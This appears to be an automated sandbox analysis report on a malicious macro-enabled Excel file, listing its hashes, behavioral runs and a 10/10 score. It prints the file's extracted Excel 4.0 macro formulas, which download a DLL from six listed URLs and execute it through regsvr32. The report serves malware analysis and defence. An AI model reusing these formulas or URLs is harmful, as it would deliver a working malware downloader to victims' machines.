General
-
Target
dsdoqfly
-
Size
46KB
-
Sample
220522-f2z8nsfff6
-
MD5
d9883e148131f32bb4b91424ae137653
-
SHA1
cfa6adaba6ac865ce814a05898b42b3378cbc3a2
-
SHA256
36b9445ba8e049935f86955d9c9251334fa60c940b28d69da57f97926e54211f
-
SHA512
479d1303f956b47af0e9498e8b18b62c5ef5d5b2a48c6bb1a10fd4a25ce5fa054e9dff72bf61b3e4fad3e7bfe65ba839bfe98ab89c87f41be16646413695b59c
Behavioral task
behavioral1
Sample
dsdoqfly.xlsm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
dsdoqfly.xlsm
Resource
win10v2004-20220414-en
Malware Config
Extracted
http://eles-tech.com/css/KzMysMqFMs/
http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
https://txpcrescue.com/cgi-bin/5tSO8/
http://hadramout21.com/jetpack-temp/Py/
http://haribuilders.com/zoombox-master/4HYGX/
http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()
Extracted
http://eles-tech.com/css/KzMysMqFMs/
http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
https://txpcrescue.com/cgi-bin/5tSO8/
Extracted
http://eles-tech.com/css/KzMysMqFMs/
http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
Targets
-
-
Target
dsdoqfly
-
Size
46KB
-
MD5
d9883e148131f32bb4b91424ae137653
-
SHA1
cfa6adaba6ac865ce814a05898b42b3378cbc3a2
-
SHA256
36b9445ba8e049935f86955d9c9251334fa60c940b28d69da57f97926e54211f
-
SHA512
479d1303f956b47af0e9498e8b18b62c5ef5d5b2a48c6bb1a10fd4a25ce5fa054e9dff72bf61b3e4fad3e7bfe65ba839bfe98ab89c87f41be16646413695b59c
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-